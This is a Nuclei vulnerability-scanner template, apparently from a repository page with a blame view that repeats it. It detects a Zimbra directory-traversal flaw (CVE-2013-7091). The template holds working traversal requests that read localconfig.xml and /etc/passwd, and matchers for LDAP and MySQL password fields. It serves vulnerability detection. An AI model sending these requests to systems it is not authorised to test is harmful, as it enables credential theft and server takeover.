nuclei-templates/cves/2013/CVE-2013-7091.yaml

id: CVE-2013-7091

info:
  name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion
  author: rubina119
  severity: critical
  description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-7091
    - https://www.exploit-db.com/exploits/30085
    - https://www.exploit-db.com/exploits/30472
  tags: cve,cve2013,zimbra,lfi
  classification:
    cve-id: CVE-2013-7091

requests:
  - method: GET
    path:
      - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
      - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        words:
          - "zimbra_server_hostname"
          - "zimbra_ldap_userdn"
          - "zimbra_ldap_password"
          - "ldap_postfix_password"
          - "ldap_amavis_password"
          - "ldap_nginx_password"
          - "mysql_root_password"
        condition: or

      - type: regex
        regex:
          - "root=.*:0:0"

# Enhanced by mp on 2022/02/24
[Add] - Zimbra unauthenticated LFI (#3571) * add zimbra lfi * template updates - CVE update - Matchers update - Additional LFI payload + matchers * Update CVE-2013-7091.yaml * Revert "Update CVE-2013-7091.yaml" This reverts commit fdffa3944f29754d8971a2697754011d29677c42. Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-01-21 07:32:08 +00:00			`id: CVE-2013-7091`

			`info:`
Dashboard Text Enhancements (#3773) Dashboard Text Enhancements 2022-02-25 14:32:23 +00:00			`name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion`
[Add] - Zimbra unauthenticated LFI (#3571) * add zimbra lfi * template updates - CVE update - Matchers update - Additional LFI payload + matchers * Update CVE-2013-7091.yaml * Revert "Update CVE-2013-7091.yaml" This reverts commit fdffa3944f29754d8971a2697754011d29677c42. Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-01-21 07:32:08 +00:00			`author: rubina119`
			`severity: critical`
Dashboard Text Enhancements (#3773) Dashboard Text Enhancements 2022-02-25 14:32:23 +00:00			`description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.`
[Add] - Zimbra unauthenticated LFI (#3571) * add zimbra lfi * template updates - CVE update - Matchers update - Additional LFI payload + matchers * Update CVE-2013-7091.yaml * Revert "Update CVE-2013-7091.yaml" This reverts commit fdffa3944f29754d8971a2697754011d29677c42. Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-01-21 07:32:08 +00:00			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2013-7091`
			`- https://www.exploit-db.com/exploits/30085`
			`- https://www.exploit-db.com/exploits/30472`
			`tags: cve,cve2013,zimbra,lfi`
Dashboard Text Enhancements (#3773) Dashboard Text Enhancements 2022-02-25 14:32:23 +00:00			`classification:`
			`cve-id: CVE-2013-7091`
[Add] - Zimbra unauthenticated LFI (#3571) * add zimbra lfi * template updates - CVE update - Matchers update - Additional LFI payload + matchers * Update CVE-2013-7091.yaml * Revert "Update CVE-2013-7091.yaml" This reverts commit fdffa3944f29754d8971a2697754011d29677c42. Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-01-21 07:32:08 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"`
			`- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"`

			`stop-at-first-match: true`
			`matchers-condition: or`
			`matchers:`
			`- type: word`
			`words:`
			`- "zimbra_server_hostname"`
			`- "zimbra_ldap_userdn"`
			`- "zimbra_ldap_password"`
			`- "ldap_postfix_password"`
			`- "ldap_amavis_password"`
			`- "ldap_nginx_password"`
			`- "mysql_root_password"`
			`condition: or`

			`- type: regex`
			`regex:`
Dashboard Text Enhancements (#3773) Dashboard Text Enhancements 2022-02-25 14:32:23 +00:00			`- "root=.*:0:0"`

			`# Enhanced by mp on 2022/02/24`